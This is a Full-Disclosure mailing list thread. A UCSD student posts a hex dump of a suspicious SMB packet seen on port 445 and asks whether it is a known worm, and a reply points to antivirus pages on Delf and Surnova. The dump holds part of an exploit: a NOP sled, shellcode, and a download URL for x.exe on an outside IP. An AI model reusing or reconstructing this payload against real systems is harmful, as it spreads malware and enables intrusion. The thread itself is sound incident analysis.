If you don't have access to the source machine, then maybe take a look here... http://www.pestpatrol.com/pestinfo/t/trojandownloader_win32_delf.asp
...or maybe here... http://www.pestpatrol.com/pestinfo/w/worm_p2p_surnova.asp without more info (rest of packet, openports output, etc)... --- Sumeet SINGH <[EMAIL PROTECTED]> wrote: > hi, > > We've been seeing a large number of copies of a TCP > packet to port 445, > that includes the following portion that we have not > seen before: > > 00 00 0c f4 ff 53 4d 42 25 00 00 00 00 18 07 c8 > .....SMB%....... > 00 00 00 00 00 00 00 00 00 00 00 00 00 08 dc 04 > ................ > 00 08 60 00 10 00 00 a0 0c 00 00 00 04 00 00 00 > ..`............. > 00 00 00 00 00 00 00 00 00 54 00 a0 0c 54 00 02 > .........T...T.. > 00 26 00 00 40 b1 0c 10 5c 00 50 00 49 00 50 00 > .&[EMAIL PROTECTED] > 45 00 5c 00 00 00 00 00 05 00 00 03 10 00 00 00 > E.\............. > a0 0c 00 00 01 00 00 00 88 0c 00 00 00 00 09 00 > ................ > ec 03 00 00 00 00 00 00 ec 03 00 00 90 90 90 90 > ................ > 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 > ................ > 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 > ................ > 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 > ................ > 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 > ................ > 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 > ................ > 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 > ................ > 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 > ................ > 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 > ................ > 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 > ................ > 90 90 90 90 90 90 90 90 90 90 90 90 eb 58 68 74 > .............Xht > 74 70 3a 2f 2f 32 30 32 2e 31 2e 32 30 30 2e 31 > tp://202.1.200.1 > 39 3a 32 34 34 36 2f 78 2e 65 78 65 df df df df > 9:2446/x.exe.... > df df df df df df df df df 4d 6f 7a 69 6c 6c 61 > .........Mozilla > 2f 34 2e 30 df 5d 33 c9 66 b9 ee 01 8d 75 05 8b > /4.0.]3.f....u.. > fe 8a 06 3c 99 75 05 46 8a 06 2c 30 46 34 99 88 > .....u.F..,0F4.. > > (the remainder of the packet has been removed) > > Has anyone seen this before? > The IP address (202.1.200.19) is unreachable. > > Is this an old exploit (worm/bot) that just took its > time to come around > to us? > > -- sumeet > PhD. Student > UCSD > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: > http://lists.netsys.com/full-disclosure-charter.html > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
